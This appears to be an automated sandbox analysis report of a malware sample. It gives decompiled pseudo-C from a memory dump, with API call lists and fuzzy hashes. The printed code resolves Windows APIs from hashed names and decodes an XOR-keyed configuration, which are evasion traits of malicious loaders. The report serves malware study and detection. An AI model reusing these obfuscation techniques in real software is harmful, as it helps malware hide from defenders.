                                                                                                                                                                                                                        0x026f49da
                                                                                                                                                                                                                        0x026f4aea
                                                                                                                                                                                                                        0x026f4af1
                                                                                                                                                                                                                        0x026f4af1
                                                                                                                                                                                                                        0x026f49e9
                                                                                                                                                                                                                        0x026f49f4
                                                                                                                                                                                                                        0x026f49f7
                                                                                                                                                                                                                        0x026f49fc
                                                                                                                                                                                                                        0x026f4a11
                                                                                                                                                                                                                        0x026f4a17
                                                                                                                                                                                                                        0x026f4a18
                                                                                                                                                                                                                        0x026f4a1b
                                                                                                                                                                                                                        0x026f4a21
                                                                                                                                                                                                                        0x026f4a24
                                                                                                                                                                                                                        0x026f4a29
                                                                                                                                                                                                                        0x026f4a31
                                                                                                                                                                                                                        0x026f4a3d
                                                                                                                                                                                                                        0x026f4a41
                                                                                                                                                                                                                        0x026f4ad1
                                                                                                                                                                                                                        0x026f4a47
                                                                                                                                                                                                                        0x026f4a47
                                                                                                                                                                                                                        0x026f4a4c
                                                                                                                                                                                                                        0x026f4a53
                                                                                                                                                                                                                        0x026f4a67
                                                                                                                                                                                                                        0x026f4a6b
                                                                                                                                                                                                                        0x026f4aba
                                                                                                                                                                                                                        0x026f4a6d
                                                                                                                                                                                                                        0x026f4a6e
                                                                                                                                                                                                                        0x026f4a75
                                                                                                                                                                                                                        0x026f4a8e
                                                                                                                                                                                                                        0x026f4a90
                                                                                                                                                                                                                        0x026f4a94
                                                                                                                                                                                                                        0x026f4a9b
                                                                                                                                                                                                                        0x026f4ab5
                                                                                                                                                                                                                        0x026f4a9d
                                                                                                                                                                                                                        0x026f4aa6
                                                                                                                                                                                                                        0x026f4aab
                                                                                                                                                                                                                        0x026f4aab
                                                                                                                                                                                                                        0x026f4a9b
                                                                                                                                                                                                                        0x026f4ac9
                                                                                                                                                                                                                        0x026f4ac9
                                                                                                                                                                                                                        0x026f4a41
                                                                                                                                                                                                                        0x026f4ad8
                                                                                                                                                                                                                        0x026f4ae1
                                                                                                                                                                                                                        0x026f4ae5
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F14E7: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,026F49D3,?,?,?,?,00000000,00000000), ref: 026F150C
                                                                                                                                                                                                                          • Part of subcall function 026F14E7: GetProcAddress.KERNEL32(00000000,7243775A), ref: 026F152E
                                                                                                                                                                                                                          • Part of subcall function 026F14E7: GetProcAddress.KERNEL32(00000000,614D775A), ref: 026F1544
                                                                                                                                                                                                                          • Part of subcall function 026F14E7: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 026F155A
                                                                                                                                                                                                                          • Part of subcall function 026F14E7: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 026F1570
                                                                                                                                                                                                                          • Part of subcall function 026F14E7: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 026F1586
                                                                                                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 026F49E9
                                                                                                                                                                                                                        • memset.NTDLL ref: 026F4A24
                                                                                                                                                                                                                          • Part of subcall function 026F67CF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,026F52BB,73797325), ref: 026F67E0
                                                                                                                                                                                                                          • Part of subcall function 026F67CF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 026F67FA
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(4E52454B,04B38CEF,73797325), ref: 026F4A5A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 026F4A61
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 026F4AC9
                                                                                                                                                                                                                          • Part of subcall function 026F3D1E: GetProcAddress.KERNEL32(36776F57,026F4521), ref: 026F3D39
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000001), ref: 026F4AA6
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 026F4AAB
                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000001), ref: 026F4AAF
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 478747673-0
                                                                                                                                                                                                                        • Opcode ID: 8a788db72daace947424c62bf8441a55338b2a8830d76a7e74e2d81aea707b01
                                                                                                                                                                                                                        • Instruction ID: 01f31c91941f0d056e876f82d76520f2a28e65955dfb294f838e8887ef3d4299
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a788db72daace947424c62bf8441a55338b2a8830d76a7e74e2d81aea707b01
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8312CB2C00248AFDF91AFA4DC88D9FBBBDEB04304F110869E706A7610D7359A59DB94
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                                                                        			E026F69CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                                                                        				char* _t28;
                                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                        				char* _t36;
                                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                                        				char* _t41;
                                                                                                                                                                                                                        				char* _t42;
                                                                                                                                                                                                                        				char* _t43;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t34 = __edx;
                                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                                        				_t9 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t1 = _t9 + 0x26fe62c; // 0x253d7325
                                                                                                                                                                                                                        				_t36 = 0;
                                                                                                                                                                                                                        				_t28 = E026F2372(__ecx, _t1);
                                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                                        					_t40 = __imp__;
                                                                                                                                                                                                                        					_t13 =  *_t40(_t28);
                                                                                                                                                                                                                        					_v8 = _t13;
                                                                                                                                                                                                                        					_t6 =  *_t40(_a4) + 1; // 0x4b395b1
                                                                                                                                                                                                                        					_t41 = E026F6D10(_v8 + _t6);
                                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                                        						strcpy(_t41, _t28);
                                                                                                                                                                                                                        						_pop(_t33);
                                                                                                                                                                                                                        						__imp__(_t41, _a4);
                                                                                                                                                                                                                        						_t36 = E026F40C2(_t34, _t41, _a8);
                                                                                                                                                                                                                        						E026F45B3(_t41);
                                                                                                                                                                                                                        						_t42 = E026F6747(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                        						if(_t42 != 0) {
                                                                                                                                                                                                                        							E026F45B3(_t36);
                                                                                                                                                                                                                        							_t36 = _t42;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t43 = E026F2070(_t36, _t33);
                                                                                                                                                                                                                        						if(_t43 != 0) {
                                                                                                                                                                                                                        							E026F45B3(_t36);
                                                                                                                                                                                                                        							_t36 = _t43;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					E026F45B3(_t28);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t36;
                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                        0x026f69cf
                                                                                                                                                                                                                        0x026f69d2
                                                                                                                                                                                                                        0x026f69d3
                                                                                                                                                                                                                        0x026f69db
                                                                                                                                                                                                                        0x026f69e2
                                                                                                                                                                                                                        0x026f69e9
                                                                                                                                                                                                                        0x026f69ed
                                                                                                                                                                                                                        0x026f69f3
                                                                                                                                                                                                                        0x026f69fa
                                                                                                                                                                                                                        0x026f69ff
                                                                                                                                                                                                                        0x026f6a07
                                                                                                                                                                                                                        0x026f6a11
                                                                                                                                                                                                                        0x026f6a15
                                                                                                                                                                                                                        0x026f6a19
                                                                                                                                                                                                                        0x026f6a1f
                                                                                                                                                                                                                        0x026f6a24
                                                                                                                                                                                                                        0x026f6a34
                                                                                                                                                                                                                        0x026f6a36
                                                                                                                                                                                                                        0x026f6a4d
                                                                                                                                                                                                                        0x026f6a51
                                                                                                                                                                                                                        0x026f6a54
                                                                                                                                                                                                                        0x026f6a59
                                                                                                                                                                                                                        0x026f6a59
                                                                                                                                                                                                                        0x026f6a62
                                                                                                                                                                                                                        0x026f6a66
                                                                                                                                                                                                                        0x026f6a69
                                                                                                                                                                                                                        0x026f6a6e
                                                                                                                                                                                                                        0x026f6a6e
                                                                                                                                                                                                                        0x026f6a66
                                                                                                                                                                                                                        0x026f6a71
                                                                                                                                                                                                                        0x026f6a71
                                                                                                                                                                                                                        0x026f6a7c

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F2372: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,026F69E9,253D7325,00000000,00000000,00000000,?,?,026F88FB), ref: 026F23D9
                                                                                                                                                                                                                          • Part of subcall function 026F2372: sprintf.NTDLL ref: 026F23FA
                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,?,026F88FB,?,04B395B0), ref: 026F69FA
                                                                                                                                                                                                                        • lstrlen.KERNEL32(?,?,?,026F88FB,?,04B395B0), ref: 026F6A02
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        • strcpy.NTDLL ref: 026F6A19
                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 026F6A24
                                                                                                                                                                                                                          • Part of subcall function 026F40C2: lstrlen.KERNEL32(?,?,026F88FB,026F88FB,00000001,00000000,00000000,?,026F6A33,00000000,026F88FB,?,?,026F88FB,?,04B395B0), ref: 026F40D9
                                                                                                                                                                                                                          • Part of subcall function 026F45B3: HeapFree.KERNEL32(00000000,00000000,026F5DE9,00000000,?,?,-00000008), ref: 026F45BF
                                                                                                                                                                                                                        • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,026F88FB,?,?,026F88FB,?,04B395B0), ref: 026F6A41
                                                                                                                                                                                                                          • Part of subcall function 026F6747: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,026F6A4D,00000000,?,?,026F88FB,?,04B395B0), ref: 026F6751
                                                                                                                                                                                                                          • Part of subcall function 026F6747: _snprintf.NTDLL ref: 026F67AF
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                        • String ID: =
                                                                                                                                                                                                                        • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                        • Opcode ID: f5804ec5ebfa614d8b4e394823ba679e4a8ef9037771cc11ebc6d89a3087805f
                                                                                                                                                                                                                        • Instruction ID: 7f9f92288669649d4c1d2ed64eacf2d9add5b2158a34917dba9395214ccc39cc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5804ec5ebfa614d8b4e394823ba679e4a8ef9037771cc11ebc6d89a3087805f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5311C273901229678F92BBB4DC84D6F3AAE9E857A43054019FB04EB604DF74DD429FE8
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                                        			E026FA22C(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				signed int _t18;
                                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                                        				char* _t29;
                                                                                                                                                                                                                        				char* _t30;
                                                                                                                                                                                                                        				char* _t31;
                                                                                                                                                                                                                        				char* _t32;
                                                                                                                                                                                                                        				char* _t33;
                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                                        				intOrPtr _t86;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t83 = __esi;
                                                                                                                                                                                                                        				_t80 = __edi;
                                                                                                                                                                                                                        				_t72 = __ecx;
                                                                                                                                                                                                                        				_t69 = __ebx;
                                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                                        				_t18 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        				if(E026F1CEF( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                                                                                                                                                                                                        					 *0x26fd2d0 = _v12;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t23 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        				if(E026F1CEF( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                                                                                                                                                                                                        					_t28 = 2;
                                                                                                                                                                                                                        					return _t28;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_push(_t69);
                                                                                                                                                                                                                        					_t70 = _v12;
                                                                                                                                                                                                                        					_push(_t83);
                                                                                                                                                                                                                        					_push(_t80);
                                                                                                                                                                                                                        					if(_t70 == 0) {
                                                                                                                                                                                                                        						_t29 = 0;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t66 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        						_t29 = E026F3D4D(_t72, _t70, _t66 ^ 0x48b4463f);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t29 != 0) {
                                                                                                                                                                                                                        						_t72 =  &_v8;
                                                                                                                                                                                                                        						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                                                                                                                                                                                                        							 *0x26fd240 = _v8;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t70 == 0) {
                                                                                                                                                                                                                        						_t30 = 0;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t62 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        						_t30 = E026F3D4D(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t30 != 0) {
                                                                                                                                                                                                                        						_t72 =  &_v8;
                                                                                                                                                                                                                        						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                                                                                                                                                                                                        							 *0x26fd244 = _v8;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t70 == 0) {
                                                                                                                                                                                                                        						_t31 = 0;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t58 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        						_t31 = E026F3D4D(_t72, _t70, _t58 ^ 0x01dd0365);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t31 != 0) {
                                                                                                                                                                                                                        						_t72 =  &_v8;
                                                                                                                                                                                                                        						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                                                                                                                                                                                        							 *0x26fd248 = _v8;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t70 == 0) {
                                                                                                                                                                                                                        						_t32 = 0;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t54 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        						_t32 = E026F3D4D(_t72, _t70, _t54 ^ 0x3cf823ca);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                                        						_t72 =  &_v8;
                                                                                                                                                                                                                        						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                                                                                                                                                                                        							 *0x26fd004 = _v8;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t70 == 0) {
                                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t50 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        						_t33 = E026F3D4D(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t33 != 0) {
                                                                                                                                                                                                                        						_t72 =  &_v8;
                                                                                                                                                                                                                        						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                                                                                                                                                                                        							 *0x26fd02c = _v8;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t70 == 0) {
                                                                                                                                                                                                                        						_t34 = 0;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t46 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        						_t34 = E026F3D4D(_t72, _t70, _t46 ^ 0x163b337e);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t34 != 0) {
                                                                                                                                                                                                                        						_push(_t34);
                                                                                                                                                                                                                        						_t43 = 0x10;
                                                                                                                                                                                                                        						_t44 = E026F6555(_t43);
                                                                                                                                                                                                                        						if(_t44 != 0) {
                                                                                                                                                                                                                        							_push(_t44);
                                                                                                                                                                                                                        							E026F6B92();
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t70 == 0) {
                                                                                                                                                                                                                        						_t35 = 0;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t41 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        						_t35 = E026F3D4D(_t72, _t70, _t41 ^ 0x89f501b6);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t35 != 0 && E026F6555(0, _t35) != 0) {
                                                                                                                                                                                                                        						_t86 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        						E026F4FDC(_t86 + 4, _t39);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, 0, _t70);
                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}





























                                                                                                                                                                                                                        0x026fa22c
                                                                                                                                                                                                                        0x026fa22c
                                                                                                                                                                                                                        0x026fa22c
                                                                                                                                                                                                                        0x026fa22c
                                                                                                                                                                                                                        0x026fa22f
                                                                                                                                                                                                                        0x026fa230
                                                                                                                                                                                                                        0x026fa231
                                                                                                                                                                                                                        0x026fa24b
                                                                                                                                                                                                                        0x026fa259
                                                                                                                                                                                                                        0x026fa259
                                                                                                                                                                                                                        0x026fa25e
                                                                                                                                                                                                                        0x026fa278
                                                                                                                                                                                                                        0x026fa407
                                                                                                                                                                                                                        0x026fa409
                                                                                                                                                                                                                        0x026fa27e
                                                                                                                                                                                                                        0x026fa27e
                                                                                                                                                                                                                        0x026fa27f
                                                                                                                                                                                                                        0x026fa282
                                                                                                                                                                                                                        0x026fa283
                                                                                                                                                                                                                        0x026fa288
                                                                                                                                                                                                                        0x026fa29e
                                                                                                                                                                                                                        0x026fa28a
                                                                                                                                                                                                                        0x026fa28a
                                                                                                                                                                                                                        0x026fa297
                                                                                                                                                                                                                        0x026fa297
                                                                                                                                                                                                                        0x026fa2a8
                                                                                                                                                                                                                        0x026fa2aa
                                                                                                                                                                                                                        0x026fa2b4
                                                                                                                                                                                                                        0x026fa2b9
                                                                                                                                                                                                                        0x026fa2b9
                                                                                                                                                                                                                        0x026fa2b4
                                                                                                                                                                                                                        0x026fa2c0
                                                                                                                                                                                                                        0x026fa2d6
                                                                                                                                                                                                                        0x026fa2c2
                                                                                                                                                                                                                        0x026fa2c2
                                                                                                                                                                                                                        0x026fa2cf
                                                                                                                                                                                                                        0x026fa2cf
                                                                                                                                                                                                                        0x026fa2da
                                                                                                                                                                                                                        0x026fa2dc
                                                                                                                                                                                                                        0x026fa2e6
                                                                                                                                                                                                                        0x026fa2eb
                                                                                                                                                                                                                        0x026fa2eb
                                                                                                                                                                                                                        0x026fa2e6
                                                                                                                                                                                                                        0x026fa2f2
                                                                                                                                                                                                                        0x026fa308
                                                                                                                                                                                                                        0x026fa2f4
                                                                                                                                                                                                                        0x026fa2f4
                                                                                                                                                                                                                        0x026fa301
                                                                                                                                                                                                                        0x026fa301
                                                                                                                                                                                                                        0x026fa30c
                                                                                                                                                                                                                        0x026fa30e
                                                                                                                                                                                                                        0x026fa318
                                                                                                                                                                                                                        0x026fa31d
                                                                                                                                                                                                                        0x026fa31d
                                                                                                                                                                                                                        0x026fa318
                                                                                                                                                                                                                        0x026fa324
                                                                                                                                                                                                                        0x026fa33a
                                                                                                                                                                                                                        0x026fa326
                                                                                                                                                                                                                        0x026fa326
                                                                                                                                                                                                                        0x026fa333
                                                                                                                                                                                                                        0x026fa333
                                                                                                                                                                                                                        0x026fa33e
                                                                                                                                                                                                                        0x026fa340
                                                                                                                                                                                                                        0x026fa34a
                                                                                                                                                                                                                        0x026fa34f
                                                                                                                                                                                                                        0x026fa34f
                                                                                                                                                                                                                        0x026fa34a
                                                                                                                                                                                                                        0x026fa356
                                                                                                                                                                                                                        0x026fa36c
                                                                                                                                                                                                                        0x026fa358
                                                                                                                                                                                                                        0x026fa358
                                                                                                                                                                                                                        0x026fa365
                                                                                                                                                                                                                        0x026fa365
                                                                                                                                                                                                                        0x026fa370
                                                                                                                                                                                                                        0x026fa372
                                                                                                                                                                                                                        0x026fa37c
                                                                                                                                                                                                                        0x026fa381
                                                                                                                                                                                                                        0x026fa381
                                                                                                                                                                                                                        0x026fa37c
                                                                                                                                                                                                                        0x026fa388
                                                                                                                                                                                                                        0x026fa39e
                                                                                                                                                                                                                        0x026fa38a
                                                                                                                                                                                                                        0x026fa38a
                                                                                                                                                                                                                        0x026fa397
                                                                                                                                                                                                                        0x026fa397
                                                                                                                                                                                                                        0x026fa3a2
                                                                                                                                                                                                                        0x026fa3a4
                                                                                                                                                                                                                        0x026fa3a7
                                                                                                                                                                                                                        0x026fa3a8
                                                                                                                                                                                                                        0x026fa3af
                                                                                                                                                                                                                        0x026fa3b1
                                                                                                                                                                                                                        0x026fa3b2
                                                                                                                                                                                                                        0x026fa3b2
                                                                                                                                                                                                                        0x026fa3af
                                                                                                                                                                                                                        0x026fa3b9
                                                                                                                                                                                                                        0x026fa3cf
                                                                                                                                                                                                                        0x026fa3bb
                                                                                                                                                                                                                        0x026fa3bb
                                                                                                                                                                                                                        0x026fa3c8
                                                                                                                                                                                                                        0x026fa3c8
                                                                                                                                                                                                                        0x026fa3d3
                                                                                                                                                                                                                        0x026fa3e1
                                                                                                                                                                                                                        0x026fa3eb
                                                                                                                                                                                                                        0x026fa3eb
                                                                                                                                                                                                                        0x026fa3f8
                                                                                                                                                                                                                        0x026fa404
                                                                                                                                                                                                                        0x026fa404

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,026FD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,026F2018), ref: 026FA2B0
                                                                                                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,026FD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,026F2018), ref: 026FA2E2
                                                                                                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,026FD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,026F2018), ref: 026FA314
                                                                                                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,026FD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,026F2018), ref: 026FA346
                                                                                                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,026FD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,026F2018), ref: 026FA378
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000005,026FD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,026F2018), ref: 026FA3F8
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                        • Opcode ID: 0467f6ce88600bde4a0f61d9fe3e70d735e6ae34eb196e3c64a6f730c53877fe
                                                                                                                                                                                                                        • Instruction ID: ff4f935493838b8869d5fb4b967620857fadd297994738edfa2c23bed9f0eacd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0467f6ce88600bde4a0f61d9fe3e70d735e6ae34eb196e3c64a6f730c53877fe
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94518272B10205AFCF94EBF8DDC8C5F76AEEB486047681D59A709D7208EB31ED41DA60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 026F3C55
                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(0070006F), ref: 026F3C69
                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 026F3C7B
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F3CE3
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F3CF2
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F3CFD
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                                                                        • Opcode ID: b1389735b5000f87aa79135e439f89ff9d0def0c2a09da65ad0356d2972ca512
                                                                                                                                                                                                                        • Instruction ID: 513806466410dde225ddacd770310b8a8bf4397cf701440f380329fdba35a689
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1389735b5000f87aa79135e439f89ff9d0def0c2a09da65ad0356d2972ca512
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4419136D00649EBDF41DFB8D84469EB7BAAF48300F104466EA11EB210DB72D956CB91
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
